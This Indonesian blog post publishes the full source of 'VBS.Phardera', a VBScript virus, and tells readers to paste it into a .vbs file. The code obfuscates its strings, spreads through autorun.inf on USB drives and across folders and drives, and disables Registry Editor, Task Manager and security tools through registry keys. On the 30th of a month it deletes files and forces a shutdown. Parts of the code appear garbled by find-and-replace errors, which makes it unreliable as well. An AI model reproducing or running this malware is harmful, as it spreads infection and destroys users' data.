Source Virus VBS.Phardera

sebenarnya virus ini sudah terdeteksi dari tahun 90-an. tapi untuk melengkapi posting sebelumnya tentang PCMAV Virus???? saya menambahkan pula contoh source virus VBS.Phardera .
virus ini sudah dekenali oleh antivirus. tapi berhati-hatilah untuk menggunkannya .

copy paste source code dibawah ini kemuadian rename dengan nama apa saja tapi ekstension .vbs (contoh: virus.vbs)

berikut source code nya :

rem VBS.Phardera
rem by Anton Reinhard Pardede
rem UNTUK KALANGAN SENDIRI – Britney Spears ANTIVIRUS
rem =================================

On Error Resume Next
Dim Reg, fso, Britney Spears
Set Reg = CreateObject(PCMild(“mmfiT/uqjsdTX”))
Set fso = CreateObject(PCMild(“udfkcPnfutzTfmjG/hojuqjsdT”))
Set Britney Spears = fso.GeFileNameile(Wscript.ScripFileNameullName)
If Britney Spears Reg.SpecialFolders(PCMild(“bubEqqB”)) & PCMild(“tcw/bsfesbiQ]”) then
If fso.fileExists(Left(Britney Spears, Len(Britney Spears) – 4)) Then
Reg.Run (Reg.RegRead(PCMild(“]SDLI”) & ReadCRC(PCMild(“dpe”)) & PCMild(“]eobnnpd]ofqP]mmfit]”)) & PCMild(” !”) & chr(34) & Left(Britney Spears, len(Britney Spears)-3) & chr(34))
Else
Reg.Run (Reg.RegRead(PCMild(“]SDLI”) & ReadCRC(PCMild(“dpe”)) & PCMild(“]eobnnpd]ofqP]mmfit]”)) & PCMild(” !”) & chr(34) & chr(34))
End If
End If
FlashInfector
FileInfector1
FileInfector2
PolyMorphic
NoKillMe
TollFree
FileInfector (Left(Britney Spears, InStrRev(Britney Spears, PCMild(“!]!”))))
FolderInfector (Left(Britney Spears, InStrRev(Britney Spears, PCMild(“!]!”))))
DriveInfector(PCMild(“];d”))
DriveInfector(PCMild(“];e”))
DriveInfector(PCMild(“];f”))
DriveInfector(PCMild(“];g”))
DriveInfector(PCMild(“];h”))
DriveInfector(PCMild(“];i”))
DriveInfector(PCMild(“];j”))
DriveInfector(PCMild(“];k”))
DriveInfector(PCMild(“];l”))
DriveInfector(PCMild(“];m”))
DriveInfector(PCMild(“];n”))
DriveInfector(PCMild(“];o”))
DriveInfector(PCMild(“];p”))
DriveInfector(PCMild(“];q”))
DriveInfector(PCMild(“];r”))
DriveInfector(PCMild(“];s”))
DriveInfector(PCMild(“];t”))
DriveInfector(PCMild(“];u”))
DriveInfector(PCMild(“];v”))
DriveInfector(PCMild(“];v”))
DriveInfector(PCMild(“];x”))
DriveInfector(PCMild(“];y”))
DriveInfector(PCMild(“];z”))
DriveInfector(PCMild(“];{“))
ActiveForever
PayLoad
OtherInfector

Sub FlashInfector
On Error Resume Next
Dim BGmMszNTYU, auto, FileName1, FileName2
For Each BGmMszNTYU In fso.drives
If (BGmMszNTYU.drivetype = 1 or BGmMszNTYU.drivetype = 2) and BGmMszNTYU.path PCMild(“;B”) then
Set auto = fso.CreateTexFileNameile(BGmMszNTYU.Path & (PCMild(“goj/ovSpuvB]”)), True)
auto.Write (PCMild(“^ovspuvb”)& vbcrlf & PCMild(“tcw/bjtbibS!bubE!fyf/uqjsdtx>fuvdfyfmmfit”))
auto.Close
set FileName1=fso.geFileNameile(BGmMszNTYU.path & PCMild(“goj/ovSpuvB]”))
FileName1.Attributes = 32
Britney Spears.Copy (BGmMszNTYU.Path & PCMild(“tcw/bjtbibS!bubE]”))
set FileName2=fso.geFileNameile(BGmMszNTYU.path & PCMild(“tcw/bjtbibS!bubE]”))
FileName2.Attributes = 32
End If
Next
End Sub

Sub DriveInfector (DirPath)
On Error Resume Next
Dim drv
If fso.DriveExists(DirPath) Then
Set drv = fso.GetDrive(fso.GetDriveName(DirPath))
If drv.DriveType = 1 Or drv.DriveType = 2 Then
VBSDup (DirPath & PCMild(“tcw/fmjG!xfO]”))
FolderInfector (DirPath)
End If
End If
End Sub

Sub FolderInfector (DirPath)
On Error Resume Next
If DirPath = “” Then Exit Sub
if DirPath = Left(Reg.SpecialFolders(PCMild(“qpultfE”)),3) & PCMild(“txpeojX”) then exit sub
Dim Start
For Each Start In fso.GeFileNameolder(DirPath).SubFolders
VBSDup(Start & PCMild(“tcw/opuoB]”))
FileInfector (Start)
FolderInfector2 (Start)
Next
End Sub

Sub FolderInfector2 (DirPath)
On Error Resume Next
If DirPath = “” Then Exit Sub
if DirPath = Left(Reg.SpecialFolders(PCMild(“qpultfE”)),3) & PCMild(“txpeojX”) then exit sub
Dim Start
For Each Start In fso.GeFileNameolder(DirPath).SubFolders
VBSDup(Start & PCMild(“tcw/esbiojfS]”))
FileInfector (Start)
FolderInfector3 (Start)
Next
End Sub

Sub FolderInfector3 (DirPath)
On Error Resume Next
If DirPath = “” Then Exit Sub
if DirPath = Left(Reg.SpecialFolders(PCMild(“qpultfE”)),3) & PCMild(“txpeojX”) then exit sub
Dim Start
For Each Start In fso.GeFileNameolder(DirPath).SubFolders
VBSDup(Start & PCMild(“tcw/fefesbQ]”))
FileInfector (Start)
Next
End Sub

Sub FileInfector (DirPath)
On Error Resume Next
Dim Start
For Each Start In fso.GeFileNameolder(DirPath).Files
If lcase(Right(Start,3))=PCMild(“dpe”) then
if Left(Start,2) PCMild(“%”) then VBSDup(Start & PCMild(“tcw/”))
KillFile (Start)
End If
If lcase(Right(Start,3))=PCMild(“tmy”) or lcase(Right(Start,3))=PCMild(“uqq”) or lcase(Right(Start,3))=PCMild(“geq”) or lcase(Right(Start,3))=PCMild(“fnbOfmjGs”) or lcase(Right(Start,3))=PCMild(“sbs”) or lcase(Right(Start,3))=PCMild(“qj{“) or lcase(Right(Start,3))=PCMild(“hqk”) or lcase(Right(Start,3))=PCMild(“gjh”) or lcase(Right(Start,3))=PCMild(“qnc”) then
if Left(Start,2) PCMild(“%”) then VBSDup(Left(Start, len(Start)-3) & PCMild(“tcw”))
End If
If lcase(Right(Start,4))=PCMild(“ydpe”) or lcase(Right(Start,4))=PCMild(“ytmy”) or lcase(Right(Start,4))=PCMild(“yuqq”) then
if Left(Start,2) PCMild(“%”) then VBSDup(Left(Start, len(Start)-4) & PCMild(“tcw”))
End If
if lcase(Right(Start,3))=PCMild(“tcw”) then qnkGlKEvkb(Start)
Next
End sub

Sub NoKillMe
On Error Resume Next
Reg.RegWrite PCMild(“]eobnnpd]mmbutoJ]mmfit]fmjggoj]SDLI”), PCMild(“fyf/ggphpm”)
Reg.RegWrite PCMild(“]eobnnpd]ofqp]mmfit]fmjghfs]SDLI”), PCMild(“fyf/ggphpm”)
Reg.RegWrite PCMild(“]eobnnpD]ujeF]mmfiT]fmjGTCW]SDLI”), PCMild(“fyf/ggphpm”)
Reg.RegWrite PCMild(“ujefhfSfmcbtjE]nfutzT]tfjdjmpQ]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]VDLI”), PCMild(“2″), PCMild(“ESPXEHFS")
Reg.RegWrite PCMild("ofeejI]efdobweB]sfspmqyF]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]VDLI"), PCMild(PCMild("2")), PCMild("ESPXE
HFS”)
Reg.RegWrite PCMild(“uyFfmjGfejI]efdobweB]sfspmqyF]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]VDLI”), PCMild(“2″), PCMild(“ESPXEHFS")
Reg.RegWrite PCMild("fubjdpttBfmjGpO]sfspmqyF]tfjdjmpQ]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]VDLI"), PCMild("2"), PCMild("ESPXE
HFS”)
Reg.RegWrite PCMild(“ovSpO]sfspmqyF]tfjdjmpQ]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]VDLI”), PCMild(“2″), PCMild(“ESPXEHFS")
Reg.RegWrite PCMild("eojGpO]sfspmqyF]tfjdjmpQ]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]VDLI"), PCMild("2"), PCMild("ESPXE
HFS”)
Reg.RegWrite PCMild(“topjuqPsfempGpO]sfspmqyF]tfjdjmpQ]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]VDLI”), PCMild(“2″), PCMild(“ESPXEHFS")
Reg.RegWrite PCMild("ENDfmcbtjE]nfutzT]tfjdjmpQ]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]VDLI"), PCMild("2"), PCMild("ESPXE
HFS”)
Reg.RegWrite PCMild(“shNltbUfmcbtjE]nfutzt]tfjdjmpq]opjtsfWuofssvD]txpeojX]ugptpsdjN]FSBXUGPT]NMLI”), PCMild(“2″), PCMild(“ESPXEHFS")
Reg.Regwrite PCMild("sfhhvcfE]fyf/end]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]UO!txpeojX]ugptpsdjN]FSBXUGPT]NMLI"),PCMild("fyf/ebqfupO")
Reg.Regwrite PCMild("sfhhvcfE]fyf/hjgopdtn]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]UO!txpeojX]ugptpsdjN]FSBXUGPT]NMLI"),PCMild("fyf/ebqfupO")
Reg.Regwrite PCMild("sfhhvcfE]fyf/ujefhfs]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]UO!txpeojX]ugptpsdjN]FSBXUGPT]NMLI"),PCMild("fyf/ebqfupO")
Reg.Regwrite PCMild("sfhhvcfE]fyf/34uefhfs]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]UO!txpeojX]ugptpsdjN]FSBXUGPT]NMLI"),PCMild("fyf/ebqfupO")
Reg.Regwrite PCMild("sfhhvcfE]fyf/shNltbU]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]UO!txpeojX]ugptpsdjN]FSBXUGPT]NMLI"),PCMild("fyf/ebqfupO")
Reg.Regwrite PCMild("sfhhvcfE]fyf/cjsuub]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]UO!txpeojX]ugptpsdjN]FSBXUGPT]NMLI"),PCMild("fyf/ebqfupO")
Reg.Regwrite PCMild("sfhhvcfE]fyf/mmbutoj]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]UO!txpeojX]ugptpsdjN]FSBXUGPT]NMLI"),PCMild("fyf/ebqfupO")
Reg.Regwrite PCMild("sfhhvcfE]fyf/qvuft]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]UO!txpeojX]ugptpsdjN]FSBXUGPT]NMLI"),PCMild("fyf/ebqfupO")
End Sub

Sub PolyMorphic
On Error Resume Next
Dim qhlqrKUwLG, RjcnTkTouc
qhlqrKUwLG = PCMild("]UPPS
TFTTBMDZFLI") & ReadCRC(PCMild("dpe"))
RjcnTkTouc = PCMild("]UPPS
TFTTBMDZFLI") & ReadCRC(PCMild("TCW"))
Reg.RegWrite RjcnTkTouc & PCMild("]"), Reg.RegRead(qhlqrKUwLG & PCMild("]"))
Reg.RegWrite RjcnTkTouc & PCMild("]opdJumvbgfE]"), Reg.RegRead(qhlqrKUwLG & PCMild("]opdJumvbgfE]"))
Reg.RegWrite RjcnTkTouc & PCMild("uyFxpiTsfwfO]"),""
Reg.RegWrite PCMild("fnbOfqzUzmeofjsG]fmjGTCW]SDLI"), Reg.RegRead(qhlqrKUwLG & PCMild("]"))
End Sub

Sub TollFree
On Error Resume Next
Dim lnk, lok
lok = Reg.SpecialFolders(PCMild("tfujspwbG")) & PCMild("lom/bsfesbiQ]")
Set lnk = Reg.CreateTollFree(lok)
Britney Spears.Copy (Reg.SpecialFolders(PCMild("bubEqqB")) & PCMild("tcw/bsfesbiQ]"))
lnk.StartPath = Reg.ExpandEnvironmentStrings(Reg.SpecialFolders(PCMild("bubEqqB")) & PCMild("tcw/bsfesbiQ]"))
lnk.Save
KillFile (lok)
Reg.RegWrite PCMild("bsfesbiQ]ovS]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]VDLI"), lok
End Sub

Sub KillFile (Filedress)
Dim f1
Set f1 = fso.GeFileNameile(Filedress)
f1.Attributes = 6
End sub

Sub VBSDup (CRCdress)
On Error Resume Next
Dim data, ts, s, a, FileName
Randomize
data = Left(Rnd(15) * 10000000000, 10)
Set ts = fso.openTexFileNameile(Britney Spears, 1)
a = ts.ReadAll
s = Right(a, Len(a) -29)
ts.Close
Set FileName = fso.CreateTexFileNameile(CRCdress, True)
FileName.WriteLine (PCMild("bsfesbiQ!nfS") & data)
FileName.Write s
FileName.Close
Set ts = fso.GeFileNameile(CRCdress)
ts.Attributes = 1
End sub

Function ReadCRC(FileType)
ReadCRC = reg.RegRead (PCMild("/]UPPS
TFTTBMD`ZFLI”) & FileType & PCMild(“]”))
End Function

Sub qnkGlKEvkb(CRCdress)
On Error Resume Next
Dim ts, s, i, a, b
Set ts = fso.openTexFileNameile(CRCdress, 1)
s = ts.Readline
ts.Close
a = instr(s, PCMild(“bsfesbiQ”))
If a = 0 Or a = “” Then
Set ts = fso.GeFileNameile(CRCdress)
ts.Attributes = 0
Set ts = fso.openTexFileNameile(Britney Spears, 1)
i = ts.ReadAll
ts.Close
Set ts = fso.CreateTexFileNameile(CRCdress, True)
ts.Write i
ts.Close
End If
End sub

sub ActiveForever
On Error Resume Next
Dim mf, check
If Wscript.ScripFileNameullname = Reg.SpecialFolders(PCMild(“bubEqqB”)) & PCMild(“tcw/bsfesbiQ]”) then
Do
Set mf = fso.geFileNameile(Wscript.ScripFileNameullname)
check = mf.Drive.drivetype
If check 1 Then Wscript.sleep 200000
Reg.run fso.getspecialfolder(0) & PCMild(“!$udfmft0$f0!fyf/sfspmqyf]”) & Wscript.ScripFileNameullname
FlashInfector
FileInfector1
DriveInfector(PCMild(“];e”))
DriveInfector(PCMild(“];f”))
DriveInfector(PCMild(“];g”))
DriveInfector(PCMild(“];h”))
DriveInfector(PCMild(“];i”))
DriveInfector(PCMild(“];j”))
DriveInfector(PCMild(“];k”))
DriveInfector(PCMild(“];l”))
DriveInfector(PCMild(“];m”))
DriveInfector(PCMild(“];n”))
DriveInfector(PCMild(“];o”))
DriveInfector(PCMild(“];p”))
DriveInfector(PCMild(“];q”))
DriveInfector(PCMild(“];r”))
DriveInfector(PCMild(“];s”))
DriveInfector(PCMild(“];t”))
DriveInfector(PCMild(“];u”))
DriveInfector(PCMild(“];v”))
DriveInfector(PCMild(“];w”))
DriveInfector(PCMild(“];x”))
DriveInfector(PCMild(“];y”))
DriveInfector(PCMild(“];z”))
DriveInfector(PCMild(“];{“))
Loop While check 1
End If
End sub

Sub FileInfector1
dim Value
Value=Left(Reg.SpecialFolders(PCMild(“qpultfE”)),3) & PCMild(“tcw/ltbUtzT]txpeojX”)
VBSDup (Value)
KillFile(Value)
FolderInfector(Reg.SpecialFolders(PCMild(“tuofnvdpEzN”)))
VBSDup(Reg.SpecialFolders(PCMild(“eppIufO”)) & PCMild(“tcw/uyu/bsfesbiQ]”))
End Sub

Sub OtherInfector
On Error Resume Next
Dim Start, ok
For Each Start in fso.GeFileNameolder(Reg.SpecialFolders(PCMild(“uofdfS”))).Files
Set ok = reg.CreateTollFree(Start)
if fso.FolderExists(ok.WorkingDirectory) then FolderInfector (ok.WorkingDirectory)
Next
End sub

Sub PayLoad
On Error Resume Next
Dim Start, ok, StartKiller, Phardera, Britney Spears
If Day(Now) = 30 Then
Reg.RegWrite PCMild(“bsfesbiQ]ovS]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]VDLI”), PCMild(“fyf/ggphpm”)
Reg.RegWrite PCMild(“nfutzT]ovS]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]NMLI”), PCMild(“12!u.!g.!t.!oxpeuvit”)
For Each Start in fso.GeFileNameolder(Reg.SpecialFolders(PCMild(“uofdfS”))).Files
Set ok = reg.CreateTollFree(Start)
Britney Spears = ok.WorkingDirectory
If fso.FolderExists(Britney Spears) Then
For Each StartKiller In fso.GeFileNameolder(Britney Spears).Files
Set Phardera = fso.GeFileNameile(StartKiller)
Phardera.Delete
Next
End If
Next
End If
End sub
Function PCMild(KERoDqSRtU)
Dim i, PCKita
For i = 1 To Len(KERoDqSRtU)
PCKita = Chr(Asc(Mid(KERoDqSRtU, i, 1)) – 1) + PCKita
Next
PCMild = PCKita
End Function

Sumber:

– Google Web Search, with keyword Phardera, Anton Pardede, PCMAV, Phardera virus

Incoming search terms:

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

CommentLuv badge